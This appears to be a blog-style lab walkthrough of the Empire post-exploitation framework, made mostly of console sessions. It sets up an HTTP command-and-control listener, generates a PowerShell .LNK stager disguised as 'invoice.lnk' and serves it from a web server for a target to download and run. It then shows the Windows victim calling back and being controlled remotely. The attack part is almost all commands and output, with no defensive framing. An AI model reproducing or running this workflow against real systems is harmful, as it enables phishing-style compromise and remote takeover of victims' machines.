Initial setup
Build a C2 server called listener
================================================================
[Empire] Post-Exploitation Framework
================================================================
[Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================
_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
| |__ | \ / | | |_) | | | | |_) | | |__
| __| | |\/| | | ___/ | | | / | __|
| |____ | | | | | | | | | |\ \----.| |____
|_______||__| |__| | _| |__| | _| `._____||_______|
285 modules currently loaded
0 listeners currently active
0 agents currently active
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
http http_com http_foreign http_hop http_mapi
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info
Name: HTTP[S]
Category: client_server
Authors:
@harmj0y
Description:
Starts a http[s] listener (PowerShell or Python) that uses a
GET/POST approach.
HTTP[S] Options:
Name Required Value Description
---- -------- ------- -----------
SlackToken False Your SlackBot API token to communicate with your Slack instance.
ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
KillDate False Date for the listener to exit (MM/dd/yyyy).
Name True http Name for the listener.
Launcher True powershell -noP -sta -w 1 -enc Launcher string.
DefaultDelay True 5 Agent delay/reach back interval (in seconds).
DefaultLostLimit True 60 Number of missed checkins before exiting
WorkingHours False Hours for the agent to operate (09:00-17:00).
SlackChannel False #general The Slack channel or DM that notifications will be sent to.
DefaultProfile True /admin/get.php,/news.php,/login/ Default communication profile for the agent.
process.php|Mozilla/5.0 (Windows
NT 6.1; WOW64; Trident/7.0;
rv:11.0) like Gecko
Host True http://192.168.164.154:80 Hostname/IP for staging.
CertPath False Certificate path for https listeners.
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0).
Proxy False default Proxy to use for request (default, none, or other).
UserAgent False default User-agent string to use for the staging request (default, none, or other).
StagingKey True x,v|hOzsE1+7r.<5YwpjgT2R[6B0inmd Staging key for initial agent negotiation.
BindIP True 0.0.0.0 The IP to bind to on the control server.
Port True 80 Port for the listener.
ServerVersion True Microsoft-IIS/7.5 Server header for the control server.
StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php
(Empire: listeners/http) > set BindIP 192.168.164.154
(Empire: listeners/http) > execute
[*] Starting listener 'http'
* Serving Flask app "http" (lazy loading)
* Environment: production
WARNING: Do not use the development server in a production environment.
Use a production WSGI server instead.
* Debug mode: off
[+] Listener successfully started!
Creating a callback program
Create a callback program called stager
(Empire) > usestager
multi/bash osx/applescript osx/launcher osx/teensy windows/ducky windows/launcher_vbs windows/teensy
multi/launcher osx/application osx/macho windows/backdoorLnkMacro windows/hta windows/launcher_xml
multi/macro osx/ducky osx/macro windows/bunny windows/launcher_bat windows/macro
multi/pyinstaller osx/dylib osx/pkg windows/csharp_exe windows/launcher_lnk windows/macroless_msword
multi/war osx/jar osx/safari_launcher windows/dll windows/launcher_sct windows/shellcode
(Empire) > usestager windows/launcher_lnk
(Empire: stager/windows/launcher_lnk) > info
Name: LNKLauncher
Description:
Create a .LNK file that launches the Empire
stager.
Options:
Name Required Value Description
---- -------- ------- -----------
Listener True Listener to generate stager for.
OutFile True clickme.lnk File to output LNK to.
LNKComment False LNK Comment.
Base64 True True Switch. Base64 encode the output.
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Icon False C:\program files\windows nt\accessories\wordpad.exePath to LNK icon.
PowershellPath True C:\windows\system32\WindowsPowershell\v1.0\powershell.exePath to powershell.exe
StagerRetries False 0 Times for the stager to retry
connecting.
(Empire: stager/windows/launcher_lnk) > set Listener http
(Empire: stager/windows/launcher_lnk) > set OutFile invoice.lnk
(Empire: stager/windows/launcher_lnk) > execute
[*] Stager output written out to: invoice.lnk
Program distribution
This time, build a simple web server, download it, and let the target execute stager.
root@kali:/opt/Empire# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
192.168.164.144 - - [21/Apr/2019 11:40:05] "GET / HTTP/1.1" 200 -
192.168.164.144 - - [21/Apr/2019 11:40:07] "GET /invoice.lnk HTTP/1.1" 200 -
Remote operation
If the callback occurs safely and you can connect to the C2 server, operate it remotely
(Empire: stager/windows/launcher_lnk) > [*] Sending POWERSHELL stager (stage 1) to 192.168.164.144
[*] New agent K2FYZV6W checked in
[+] Initial agent K2FYZV6W from 192.168.164.144 now active (Slack)
[*] Sending agent (stage 2) to K2FYZV6W at 192.168.164.144
(Empire: stager/windows/launcher_lnk) > back
(Empire) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
K2FYZV6W ps 192.168.164.144 DESKTOP-1SS146L DESKTOP-1SS146L\marseil powershell 592 5/0.0 2019-04-21 11:41:45
(Empire: agents) > rename K2FYZV6W target01
(Empire: agents) > list
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
target01 ps 192.168.164.144 DESKTOP-1SS146L DESKTOP-1SS146L\marseil powershell 592 5/0.0 2019-04-21 11:42:10
(Empire: agents) > interact target01
(Empire: target01) > sysinfo
[*] Tasked K2FYZV6W to run TASK_SYSINFO
[*] Agent K2FYZV6W tasked with task ID 1
(Empire: target01) > sysinfo: 0|http://192.168.164.154:80|DESKTOP-1SS146L|marseille|DESKTOP-1SS146L|192.168.164.144|Microsoft Windows 10 Pro|False|powershell|592|powershell|5
[*] Agent K2FYZV6W returned results.
Listener: http://192.168.164.154:80
Internal IP: 192.168.164.144
Username: DESKTOP-1SS146L\marseille
Hostname: DESKTOP-1SS146L
OS: Microsoft Windows 10 Pro
High Integrity: 0
Process Name: powershell
Process ID: 592
Language: powershell
Language Version: 5
[*] Valid results returned by 192.168.164.144
(Empire: target01) > hostname
[*] Tasked K2FYZV6W to run TASK_SHELL
[*] Agent K2FYZV6W tasked with task ID 2
(Empire: target01) > [*] Agent K2FYZV6W returned results.
HostName Aliases AddressList
-------- ------- -----------
DESKTOP-1SS146L {} {192.168.164.144}
[*] Valid results returned by 192.168.164.144